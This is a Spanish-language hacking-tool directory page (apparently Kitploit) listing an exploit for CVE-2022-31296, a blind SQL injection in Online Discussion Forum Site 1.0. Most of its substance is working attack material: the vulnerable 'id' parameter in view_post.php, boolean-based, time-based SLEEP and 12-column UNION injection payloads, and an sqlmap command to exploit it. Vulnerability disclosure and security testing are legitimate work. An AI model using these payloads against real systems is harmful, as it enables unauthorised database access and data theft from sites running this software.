Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-31296 — Sitio de Foro de Discusión en Línea 1.0 - Inyección SQL a Ciegas | Kitploit
Herramientas/GitHubGitHub/bigzooooz/cve-2022-31296
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubbigzooooz/cve-2022-31296

CVE-2022-31296

Sitio de Foro de Discusión en Línea 1.0 - Inyección SQL a Ciegas

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-31296

Sitio de Foro de Discusión en Línea 1.0 - Inyección SQL a ciegas

Título del Exploit: Sitio de Foro de Discusión en Línea 1.0 - Inyección SQL a ciegas

Fecha: 2022-06-13

CVE: CVE-2022-31296

Autor del Exploit: Abdulaziz Saad (@b4zb0z)

Página del Proveedor: https://www.sourcecodester.com/

Enlace del Software:

https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Versión: 1.0

Probado en: LAMP, Ubuntu


[#] Ubicación de la vulnerabilidad: $_GET['id'] en /odfs/posts/view_post.php:3

root@kitploit:~
Parámetro: id (GET)
root@kitploit:~
Tipo: a ciegas basado en booleano
Título: cláusula AND a ciegas basada en booleano - WHERE o HAVING
Payload: p=posts/view_post&id=1' AND 8036=8036 AND 'zhKq'='zhKq
root@kitploit:~
Tipo: a ciegas basado en tiempo
root@kitploit:~
Título: MySQL >= 5.0.12 AND a ciegas basado en tiempo (query SLEEP)
Payload: p=posts/view_post&id=1' AND (SELECT 4593 FROM (SELECT(SLEEP(5)))Tmcg) AND 'qyDN'='qyDN
root@kitploit:~
Tipo: consulta UNION
root@kitploit:~
Título: consulta UNION genérica (NULL) - 12 columnas
Payload: p=posts/view_post&id=-5399' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767671,0x5a7272534b4b78734a53464e62454b52617876484e6670665570454454526a6963626f506e45776e,0x717a707671)-- -

[#] Explotación con SQLMAP: sqlmap -u "http://localhost/odfs/?p=posts/view_post&id=1" --dbms=mysql

Descargar herramienta